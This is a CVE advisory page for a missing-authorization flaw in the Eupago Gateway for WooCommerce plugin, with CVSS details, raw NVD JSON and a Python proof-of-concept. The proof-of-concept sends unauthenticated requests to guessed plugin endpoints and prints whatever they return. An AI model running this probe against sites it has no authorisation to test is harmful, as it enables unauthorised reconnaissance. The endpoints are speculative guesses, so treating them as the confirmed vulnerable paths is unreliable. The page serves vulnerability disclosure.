Security Vulnerability Report
中文
CVE-2025-62870 CVSS 5.3 MEDIUM

CVE-2025-62870

Published: 2025-12-09 16:18:04
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in Eupago Eupago Gateway For Woocommerce eupago-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eupago Gateway For Woocommerce: from n/a through <= 4.7.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Eupago Gateway For Woocommerce <= 4.7.1
Eupago Gateway For Woocommerce <= 4.6.3 (confirmed by Patchstack)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62870 PoC - Missing Authorization in Eupago Gateway For Woocommerce # Target: WordPress site with vulnerable Eupago plugin (<= 4.7.1) def check_vulnerability(target_url): """ Check if the target is vulnerable to CVE-2025-62870 This checks for missing authorization in Eupago Gateway For Woocommerce plugin """ # Common WordPress API endpoints that might be affected endpoints = [ '/wp-json/eupago/v1/settings', '/wp-json/eupago/v1/config', '/wp-json/eupago/v1/payment-methods', '/wp-admin/admin-ajax.php?action=eupago_get_settings', '/wp-admin/admin-ajax.php?action=eupago_config' ] vulnerable = False for endpoint in endpoints: url = target_url.rstrip('/') + endpoint try: # Send request without authentication response = requests.get(url, timeout=10, verify=False) # Check if we can access protected endpoints without auth if response.status_code == 200: data = response.json() if 'eupago' in str(data).lower() or 'gateway' in str(data).lower(): print(f"[+] Potential vulnerability found at: {url}") print(f"[+] Response: {data}") vulnerable = True elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint protected: {url}") except Exception as e: print(f"[-] Error checking {url}: {e}") return vulnerable if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve-2025-62870.py <target_url>") print("Example: python cve-2025-62870.py http://example.com") sys.exit(1) target = sys.argv[1] print(f"[*] Scanning {target} for CVE-2025-62870...") if check_vulnerability(target): print("\n[!] Target appears to be vulnerable to CVE-2025-62870") print("[!] Recommendation: Update Eupago Gateway For Woocommerce to latest version") else: print("\n[+] Target does not appear to be vulnerable or plugin not installed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62870", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:04.073", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Eupago Eupago Gateway For Woocommerce eupago-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Eupago Gateway For Woocommerce: from n/a through <= 4.7.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/eupago-gateway-for-woocommerce/vulnerability/wordpress-eupago-gateway-for-woocommerce-plugin-4-6-3-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}